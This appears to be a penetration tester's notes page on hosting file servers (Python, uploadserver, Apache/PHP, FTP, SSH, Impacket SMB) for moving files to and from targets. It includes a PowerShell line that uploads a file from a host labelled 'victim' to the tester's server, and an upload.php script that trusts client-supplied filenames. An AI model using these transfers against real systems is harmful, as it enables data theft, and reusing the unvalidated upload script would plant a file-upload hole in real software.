File Server Hosting
Tips and tricks for setting up servers for uploading/downloading files
Creating a server can be a quick way to upload or download files to or from our targets.
There are several options to take a look at below.
This enables you to host files.
Others can upload files but cannot POST (download) files.
# Start up an HTTP web server using Python. Files in the directory are hosted.
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# Change the port like so
└─$ python3 -m http.server 4444
# Change the directory to host files from
└─$ python3 -m http.server 4444 -d ~/Documents
This is similar to the Python HTTP Server above but also allows for uploading (POST) files.
The connection is also encrypted with a self-signed certificate.
# Install the module
python3 -m pip install --user uploadserver
# Create a self-signed certificate - Don't store this in the same dir as the web server
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
# Starting the webserver from directory ~/https
python3 -m uploadserver 443 --server-certificate ../server.pem
# Change the port and directory like so
python3 -m uploadserver 4444 --directory new-dir/ --server-certificate ~/Documents/server.pem
Apache2 should be installed on the Linux host.
This enables you to host files.
Others can upload/download files.
# On Linux, Create a folder called 'uploads'
└─$ sudo mkdir /var/www/uploads
# Grant ownership to user 'www-data' over this folder
sudo chown www-data: /var/www/uploads
# Create a PHP script called 'upload.php' and save it to /var/www/html
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
# On Windows, run this command to upload the file 'testfile' to the apache server on the Linux host
PS C:\Users\victim> powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.127.134/upload.php', '.\testfile'
└─$ php -S 0.0.0.0:8000
└─$ ruby -run -ehttpd . -p8000
This enables you to host files.
Others can upload/download files.
# On Linux, install some prerequisites
└─$ sudo apt install python3
└─$ sudo apt install python3-pip
└─$ sudo pip3 install pyftpdlib
# On Linux, start up the ftp server. The directory this is run from is what is served.
└─$ sudo python3 -m pyftpdlib --port 21 --write
# On Windows, use FTP (or another method) to upload / download files
PS C:\Users\victim> ftp <linux ip> <port>
# login using anonymous:anonymous
# upload file
ftp> put windowsfile
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
# download file
ftp> get linuxfile
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
This enables an SSH server.
Consider creating a new account for accessing this so as not to expose your primary creds on a remote system.
# Optional, enable/disable SSH server at system boot
sudo systemctl enable ssh
sudo systemctl disable ssh
# Start/stop SSH server
sudo systemctl start ssh
sudo systemctl stop ssh
# Verify SSH is up and running
netstat -lnpt
# Verify SSH is up and running
systemctl status ssh
# On Linux, install some prerequisites
└─$ sudo apt install python3
└─$ sudo apt install python3-pip
└─$ python3 -m pip install impacket
# Start SMB server, (-smb2support needed only if connecting system requires it)
└─$ smbserver.py <ubuntuShare> <ubuntuSmbShare/> -smb2support
# Connect to SMB share with Windows (no auth)
PS C:\Users\user> cd \\172.18.22.41\UBUNTUSHARE\
Last modified 13d ago